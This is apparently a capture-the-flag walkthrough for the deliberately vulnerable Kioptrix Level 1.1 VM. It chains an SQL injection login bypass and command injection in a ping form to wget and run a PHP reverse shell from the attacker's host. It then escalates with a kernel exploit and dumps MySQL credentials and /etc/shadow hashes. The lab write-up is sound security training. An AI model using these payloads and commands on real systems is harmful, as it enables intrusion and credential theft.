Posts Kioptrix Level 1.1 CTF VM WalkThrough
Post
Cancel

Kioptrix Level 1.1 CTF VM WalkThrough

VM : Kioptrix: Level 1.1

Download Link : https://download.vulnhub.com/kioptrix/Kioptrix_Level_2-update.rar

Nmap Scan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
# Nmap 7.80 scan initiated Thu Apr 16 13:44:53 2020 as: nmap -A -oN nmap.scan 192.168.1.4                                                                                                                  [0/1246]
Nmap scan report for 192.168.1.4
Host is up (0.00042s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey:
|   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
|   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_  1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http       Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind    2 (RPC #100000)
443/tcp  open  ssl/https?
|_ssl-date: 2020-04-16T10:36:08+00:00; -3h09m42s from scanner time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|_    SSL2_RC4_64_WITH_MD5
631/tcp  open  ipp        CUPS 1.1
| http-methods:
|_  Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open  mysql      MySQL (unauthorized)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.27
Network Distance: 2 hops

Host script results:
|_clock-skew: -3h09m42s

TRACEROUTE (using port 256/tcp)
HOP RTT     ADDRESS
1   0.05 ms 172.17.0.1
2   0.32 ms 192.168.1.4

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Apr 16 13:46:48 2020 -- 1 IP address (1 host up) scanned in 115.94 seconds

Open ports are :

1
2
3
4
5
6
22/tcp   open  ssh        OpenSSH 3.9p1 (protocol 1.99)
80/tcp   open  http       Apache httpd 2.0.52 ((CentOS))
111/tcp  open  rpcbind    2 (RPC #100000)
443/tcp  open  ssl/https?
631/tcp  open  ipp        CUPS 1.1
3306/tcp open  mysql      MySQL (unauthorized)  

Port 80 is open. There is a web page

There may be an sql injection vulnerability. I tried to find sql injection with sqlmap, but it did not find anything.

1
sqlmap -u "http://192.168.1.4/index.php" --data="uname=admin&psw=12345&btnLogin=Login"

But after try to find manually with burp repeater, there is a sql injection vulnerability in psw field, which can be exploited by putting ' or 1='1 --+ in password field. and it loads another page where we can ping any device within the network.

1
2
3
4
5
6
7
8
9
192.168.1.10
PING 192.168.1.10 (192.168.1.10) 56(84) bytes of data.
64 bytes from 192.168.1.10: icmp_seq=0 ttl=64 time=55.5 ms
64 bytes from 192.168.1.10: icmp_seq=1 ttl=64 time=3.62 ms
64 bytes from 192.168.1.10: icmp_seq=2 ttl=64 time=1.08 ms

--- 192.168.1.10 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2002ms
rtt min/avg/max/mdev = 1.087/20.070/55.501/25.074 ms, pipe 2

A this functionality, there is possibility for command injection, try to execute command by providing within the ip address

1
ip_address;commad

For example

1
192.168.1.10;ls 

And as expected it returns the filenames on current directory.

1
2
3
4
5
6
7
8
9
10
11
192.168.1.10;ls
PING 192.168.1.10 (192.168.1.10) 56(84) bytes of data.
64 bytes from 192.168.1.10: icmp_seq=0 ttl=64 time=54.0 ms
64 bytes from 192.168.1.10: icmp_seq=1 ttl=64 time=3.52 ms
64 bytes from 192.168.1.10: icmp_seq=2 ttl=64 time=1.17 ms

--- 192.168.1.10 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2001ms
rtt min/avg/max/mdev = 1.175/19.587/54.059/24.394 ms, pipe 2
index.php
pingit.php

Another example :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
192.168.1.10;ls -al;pwd;whoami
PING 192.168.1.10 (192.168.1.10) 56(84) bytes of data.
64 bytes from 192.168.1.10: icmp_seq=0 ttl=64 time=57.1 ms
64 bytes from 192.168.1.10: icmp_seq=1 ttl=64 time=1.18 ms
64 bytes from 192.168.1.10: icmp_seq=2 ttl=64 time=1.17 ms

--- 192.168.1.10 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2001ms
rtt min/avg/max/mdev = 1.173/19.832/57.144/26.383 ms, pipe 2
total 24
drwxr-xr-x  2 root root 4096 Oct  8  2009 .
drwxr-xr-x  8 root root 4096 Oct  7  2009 ..
-rwxr-Sr-t  1 root root 1733 Feb  9  2012 index.php
-rwxr-Sr-t  1 root root  199 Oct  8  2009 pingit.php
/var/www/html
apache  

The user is : apache, dirctory is /var/www/html, all the files are root privileged.

Getting a remote shell

We are going to use php reverse shell from pentestmonkey.net : http://pentestmonkey.net/tools/web-shells/php-reverse-shell

Download it from there page and change the $ip and $port to your local system.

1
2
3
4
5
6
7
8
9
10
set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.1.3';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

Now to upload this php file we use series of commands. First start a server to host the bd.php(i renamed the reverse shell php file) file. We can use a simple python server

1
python -m SimpleHTTPServer 8000  

Commands to upload file

1
2
3
cd /tmp                               # change dirctory to tmp
wget http://192.168.1.3:8000/bd.php   # downlaod backdoor file
php -f bd.php                         # execute file

Remember we cant download file on webroot directory, because it is root privileged, and the ping command is executed by user apache. Before execute the commands first start the listener on local machine

1
2
$ nc -lvvp 1234
Listening on [0.0.0.0] (family 0, port 1234)

Command :

1
192.168.1.10;cd /tmp/wget http://192.168.1.3:8000/bd.php;php -f bd.php  

After the execution we can get a reverse shell on listener

1
2
3
4
5
6
7
8
9
10
11
$ nc -lvvp 1234
Listening on [0.0.0.0] (family 0, port 1234)
Connection from 192.168.1.4 45265 received!
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
 12:21:07 up  6:17,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh: no job control in this shell
sh-3.00$
sh-3.00$ whoami
apache  

And we can get the reverse shell.

Kernel Privilege Escalation

Examining the OS and Kernel version

1
2
3
4
sh-3.00# uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
sh-3.00# cat /etc/*-release
CentOS release 4.5 (Final)

A google search for kernel 2.6 exploit” give the exploit for kernel 2.6.22 less then is found from here : https://www.exploit-db.com/exploits/9542

1
2
$ wget https://www.exploit-db.com/raw/9542
$ mv 9542 peroot.c 

Now downloading it into the Kioptrix

1
2
3
4
5
6
7
sh-3.00$ cd /tmp
sh-3.00$ wget http://192.168.1.3:8000/peroot.c
sh-3.00$ gcc peroot.c -o peroot
dirty.c:109:28: warning: no newline at end of file
sh-3.00$ ./peroot
sh-3.00# whoami
root

It gives the root access.

Examining Files

By examine php files from webroot directory we find the user ‘john’ and its password ‘hiroshima’ on mysql_connect() function.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
sh-3.00# cd /var/www/html
sh-3.00# ls
index.php
pingit.php
sh-3.00# cat index.php
<?php
    mysql_connect("localhost", "john", "hiroshima") or die(mysql_error());
    //print "Connected to MySQL<br />";
    mysql_select_db("webapp");

    if ($_POST['uname'] != ""){
        $username = $_POST['uname'];
        $password = $_POST['psw'];
        $query = "SELECT * FROM users WHERE username = '$username' AND password='$password'";
        //print $query."<br>";
...
...
...

By using john credentials we can’t access the system with ssh, but we can access the mysql database. Now try to execute command in mysql :

1
2
3
4
5
6
7
8
9
10
11
12
sh-3.00# mysql -u john -phiroshima -e 'show databases;'
Database
mysql
test
webapp
sh-3.00# mysql -u john -phiroshima -e 'use webapp;show tables;'
Tables_in_webapp
users
sh-3.00# mysql -u john -phiroshima -e 'use webapp;select * from users;'
id username password
1   admin   5afac8d85f
2   john    66lajGGbla

Now at-least we get the login password for users at index.php login page.

We can also look for .mysql_history file for previous typed commands by users.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
show databases;
create database webapp;
use webapp;
create table users(id INT,username varchar(100),password varchar(10));
show database;
select * from users;
show databases;
use webapp;
insert into users values(1,'admin','hello');
select * from users;
use mysql
show databases;
use mysql;
select * from users where user=john;
show tables;
select * from user where user=john;
select * from user where user='john';
select * from user;
create user 'john'@'localhost' identified by 'hiroshima';
create user 'webapp'@'localhost' identified by 'hiroshima';
create user 'webapp'@'localhost' IDENTIFIED BY 'hiroshima';
CREATE USER 'webapp'@'localhost' identified by 'hiroshima';
update user set password = password('hiroshima') where user = 'john';
use mysql;
show users;
select * from user;
create user 'john'@'localhost' identified by 'hiroshima';
version;
-v
;
help
flush privileges;
show databases;
use mysql;
grant select,insert,update,delete on *.* to 'john'@'localhost';
update user set password = password('hiroshima') where user = 'john';
flush priveleges;
use webapp;
show tables;
update user set password = password('Ha56!blaKAbl') where user = 'admin';
update username set password = password('Ha56!blaKAbl') where user = 'admin';
select * from users;
update username set password = password('Ha56!blaKAbl') where username = 'admin';
update users set password = password('Ha56!blaKAbl') where username = 'admin';
select * from users;
insert into users values(2,'john','66lajGGbla');
select * from users;

From /etc/shadow file we got the encrypted passwords for users

1
2
3
root:$1$FTpMLT88$VdzDQTTcksukSKMLRSVlc.:14529:0:99999:7:::
john:$1$wk7kHI5I$2kNTw6ncQQCecJ.5b8xTL1:14525:0:99999:7:::
harold:$1$7d.sVxgm$3MYWsHDv0F/LP.mjL9lp/1:14529:0:99999:7:::
This post is licensed under CC BY 4.0 by the author.
Contents